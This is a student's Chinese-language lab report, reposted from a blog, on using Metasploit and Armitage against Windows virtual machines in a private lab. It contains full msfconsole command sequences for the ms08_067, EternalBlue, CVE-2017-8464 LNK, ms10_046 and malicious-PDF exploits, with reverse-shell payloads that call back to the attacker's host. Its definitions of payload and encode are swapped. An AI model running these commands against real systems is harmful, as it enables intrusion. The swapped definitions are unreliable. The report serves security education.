Exp5 MSF基础应用 20164309 欧阳彧骁
?
1.實驗內容
1.0Armitage初體驗
在kali端輸入?armitage?啟動armitage
發現開啟失敗,更根據提示先輸入?/etc/init.d/postgresql start?,打開postgresql服務再進入armitage
更改端口為學號4309,其他選項默認不變
?
進入界面發現沒有可以攻擊的主機
?
選擇上方菜單欄hosts-nmap scan-quick scan(os detect)進行掃描
對虛擬機所在的網段進行掃描
?
選中靶機,右鍵選擇services,查看可以利用的端口
右鍵選擇scan進行掃描
選擇上方菜單欄attacks-findattacks
?
可以進行攻擊了!
對win7端攻擊失敗后,我增添了一臺xp sp3繼續進行實驗;
選中目標主機右鍵attack-smb-ms08_067_netapi
?
在攻擊win7失敗后,我下載了一個xp進行實驗,攻擊仍然失敗,猜測應該是與xp系統的中英文版本有關,中文盜版猖獗,每次有新補丁盜版方還會貼心地給用戶打上。。。
重新下載一個windows2003 server sp2,進行相關攻擊
?
2003端仍然失敗,重新在windows 2000 sp4上實驗還是失敗,也許不是系統版本與相關補丁的問題,可能是kali上的armitage配置出現了一些問題,暫時排除不了具體原因,還是用老辦法msfconsole繼續實驗吧。
?
1.1三個主動攻擊實踐+成功應用任何一個輔助模塊+唯一
1.1.1 ms08_067_netapi
攻擊端:kali 2019 192.168.236.131
靶機:win 2000 sp4 192.168.236.143
輸入?msfconsole?
輸入?search ms08_067?,查找可用的exploit
輸入 use exploit/windows/smb/ms08_067_netapi?
?輸入?show payloads? 對可使用的payload進行查找,這里我使用generic/shell_reverse_tcp
?
輸入?set payload generic/shell_reverse_tcp?
配置攻擊源地址源端口與目的地址?
set RHOST 192.168.236.143 set LPORT 4309 set LHOST 192.168.236.131輸入?show options?查看具體信息
?
輸入?exploit 進行滲透攻擊
攻擊成功?
1.1.2 ms17_010_eternalblue+ auxiliary輔助模塊掃描
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win 7 旗艦版 ip:192.168.236.128
還是沒有死心,打算再次使用armitage實驗。
選中靶機,在armitage左側目錄中選擇exploit-windows-smb-ms_010_eternalblue
看似是攻擊成功了,但是在連接sessions與調用meterpreter shell是出現了問題,看來應該是我kali中armitage工具不夠完善。還是乖乖滾回去用msf吧。
?進入msfconsole
輸入?search ms17 type: auxiliary platform:windows?查找永恒之藍的auxiliary輔助模塊掃描指令
輸入?use auxiliary/scanner/smb/smb_ms17_010 ?
輸入?set RHOSTS 192.168.239.129? 設置目標地址
輸入?run 進行掃描
能夠建立連接,開始正式攻擊
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/shell/reverse_tcp set RHOST 192.168.236.128 set LPORT 4309 set LHOST 192.168.236.131 show options exploit攻擊成功。?
1.1.3 cve 2017_8464 (震網三代) (唯一)
use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 exploit輸入?cp -r /root/.msf4/local/ /root/1 將生成的文件從隱藏文件夾中復制出來
將文件導出至U盤,連接到靶機中。
?
kali端進行監聽:
search multi/handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 run在靶機運行U盤中的FlashPlayerCPLAPP.cpl
攻擊成功。
?
1.2 一個針對瀏覽器的攻擊:ms10_046
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win xp ps3 ip:192.168.236.134
?進入msfconsole
輸入?search ms10_046?
輸入?use exploit/windows/browser/ms10_046_shortcut_icon_dllloader?
?
set payload windows/meterpreter/reverse_http set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 show options exploit靶機連接http://192.168.236.131:80/
輸入??session -i 1? 連接id為1的session獲取shell
?
攻擊成功。
1.3 一個針對客戶端的攻擊:adobe_pdf_embedded_exe
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win xp ps3 ip:192.168.236.134
?進入msfconsole
輸入?search adobe type:exploit platform:windows?查找可用漏洞,這里我選擇了adobe_pdf_embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show payloads?
?
Set payload windows/meterpreter/reverse_tcp set RHOST 192.168.236.134 set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 set FILENAME 20164309.pdf show options exploit生成文件20164309.pdf
使用nc將文件傳輸到靶機中
ncat.exe -lv 4309 > 20164309.pdf nc 192.168.236.134 4309 < 20164309.pdf攻擊機中進行監聽
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 set LPORT 4309 exploit靶機中打開文件,攻擊成功。
2.基礎問題回答
用自己的話解釋什么是exploit,payload,encode.
?Exploit:“利用”,通過漏洞來攻擊受害者,也就是拉貨的馬;
Payload:“編碼”,去掉“壞字符”,為滲透攻擊做準備;改變特征碼,起到免殺作用;也就是貨車;
Encode:“有效負載”、“shellcode”,能夠在受害者環境中進行操作,也就是裝貨的車廂。
整個攻擊過程就是馬拉著裝滿貨物的車送往目的地。
?
?
?3.實踐總結體會
3.1總結體會
本次實驗是我歷時最長的一次實驗,也是收獲最大的一次實驗。包括實驗報告的撰寫實驗五一共花費了我四個晚上的時間,讓我深深明白了什么是自學。在實驗的開始我打算圖方便使用armitage進行自動化攻擊,導致我在不停下載與更換虛擬機上浪費了過多的時間,最后還是沒有排除無法成功應用armitage。其實我還嘗試了WebExec(CVE-2018-15442)與mssql_payload但均以失敗告終,這也讓我感受到了我能力的不足。
3.2離實戰還缺些什么技術或步驟
?缺的東西大了去了,以我的水平只是到應用msf工具的水平,還不能詳細的闡述攻擊的原理;并且meterpreter庫中更新不及時,很多漏洞都及時被windows官方發現與修復,實戰性不強;同時像payload的編寫、encode的設計我們都沒有能力實現,導致攻擊方法單一,水準不夠高。
?
轉載于:https://www.cnblogs.com/20164309-kx/p/10699118.html
總結
以上是生活随笔為你收集整理的Exp5 MSF基础应用 20164309 欧阳彧骁的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Exp4 恶意代码分析 20164309
- 下一篇: Exp7 网络欺诈防范